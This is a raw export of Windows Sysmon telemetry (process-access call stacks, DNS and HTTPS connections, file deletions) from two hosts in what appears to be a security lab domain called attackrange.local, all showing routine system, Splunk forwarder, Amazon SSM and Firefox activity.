07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082833Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082832Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082831Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082830Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082829Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082828Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082827Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082826Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B429-615A-7C01-00000000FD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082825Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B429-615A-7C01-00000000FD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082824Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.027{2FDD8D40-B429-615A-7C01-00000000FD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000105554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.308{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57971- 354300x8000000000000000105551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.286{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51754-false34.98.75.3636.75.98.34.bc.googleusercontent.com443https 354300x8000000000000000105550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.284{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58948- 354300x8000000000000000105549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.280{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60307- 354300x8000000000000000105548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.254{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51138- 354300x8000000000000000105547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.254{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51753-false52.222.236.68server-52-222-236-68.fra56.r.cloudfront.net443https 354300x8000000000000000105546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.253{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-62248-false127.0.0.1-53domain 354300x8000000000000000105545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.253{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62248- 354300x8000000000000000105544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.236{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61772- 354300x8000000000000000105543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.235{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62980- 354300x8000000000000000105542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.233{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62248- 354300x8000000000000000105541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.170{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61027- 354300x8000000000000000105540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.170{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:9830:457b:b94:ffff-61027-true7f00:1:0:0:0:0:0:0-53domain 354300x8000000000000000105539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.139{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64648- 354300x8000000000000000105538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.139{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61027- 354300x8000000000000000105537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.139{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62172- 354300x8000000000000000105536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.138{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51506- 354300x8000000000000000105535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.135{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51751-false2.16.216.48a2-16-216-48.deploy.static.akamaitechnologies.com80http 354300x8000000000000000105534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.134{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60762- 354300x8000000000000000105533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.131{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50159- 23542300x8000000000000000105532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.131{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC4608EFBD6E5D8F72F2E7FE7D4CF5C2,SHA256=202F9380266C45530FAB659AB2A722AC73DA98AE8835980CF2A5729F692AF74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.014{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\pending_pings\5bbbf065-804e-4ace-b132-e14cd5e011e1MD5=1CBDA73FCFD6C639DE0483BA1095B0FA,SHA256=5DD76F14FD412DB22566A3E79756910350FA25939DDCA04CD14203F0A75EC7DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.001{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-030MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.169{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63691- 354300x8000000000000000105700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.560{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51785-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.519{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51784-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.467{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51783-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.451{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51782-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 23542300x8000000000000000105696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.818{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FD8AB206E3A8CA564C397FFF8FFE7F3,SHA256=6D61BA38CD8A22D42F22335FB8E967E39D83A3B52C214EABACB4DB908CEE3FA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.817{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+f841c8|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1ccb6 10341000x800000000000000082853Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.651{2FDD8D40-B42A-615A-7D01-00000000FD01}316700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082852Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B42A-615A-7D01-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082851Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 